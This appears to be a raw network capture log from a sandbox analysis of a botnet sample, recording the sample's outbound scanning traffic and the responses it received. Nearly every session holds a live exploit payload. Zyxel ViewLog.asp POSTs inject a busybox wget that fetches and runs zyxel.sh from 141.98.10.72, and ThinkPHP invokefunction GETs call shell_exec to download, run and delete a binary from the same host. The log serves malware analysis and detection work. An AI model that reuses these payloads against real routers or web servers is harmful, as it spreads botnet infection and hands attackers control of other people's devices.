                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:38.585901022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.393364906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:51.543768883 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      155192.168.2.155069294.64.193.328080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.518601894 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:14.768032074 CET411INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 10:26:52 GMT
                                                      Server: Webs
                                                      X-Frame-Options: SAMEORIGIN
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      156192.168.2.155519862.29.28.2518080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.519134045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:15.802700996 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:17.306524992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:20.410425901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:26.554289103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:38.585901976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.441131115 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.591969013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      157192.168.2.154687294.122.202.2558080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.521881104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      158192.168.2.153336894.187.106.1938080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:14.528695107 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      159192.168.2.154062495.100.185.3780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.215315104 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.410032988 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 35 26 23 34 36 3b 35 39 30 32 32 66 39 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;163e2217&#46;1707899355&#46;59022f9c</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      160192.168.2.153343095.216.173.12480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.246798038 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.474242926 CET355INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.14.0 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 182
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      161192.168.2.155949695.56.209.4380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.309796095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.599000931 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:29:15.599970102 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      162192.168.2.154072288.198.147.17480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.463004112 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.671544075 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      163192.168.2.154064095.100.185.3780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.504414082 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.699265957 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 36 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 35 35 26 23 34 36 3b 35 39 30 32 33 31 31 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;163e2217&#46;1707899355&#46;59023112</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      164192.168.2.153494888.147.5.6380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.554778099 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:15.790668011 CET504INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 14 Feb 2024 08:29:15 GMT
                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                      Location: https:///freepbx/error.html
                                                      Content-Length: 235
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https:///freepbx/error.html">here</a>.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      165192.168.2.154073288.198.147.17480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:15.883210897 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      166192.168.2.154018662.29.90.418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.059923887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      167192.168.2.155056494.121.217.1418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.060025930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      168192.168.2.153803494.122.107.1358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:16.060131073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
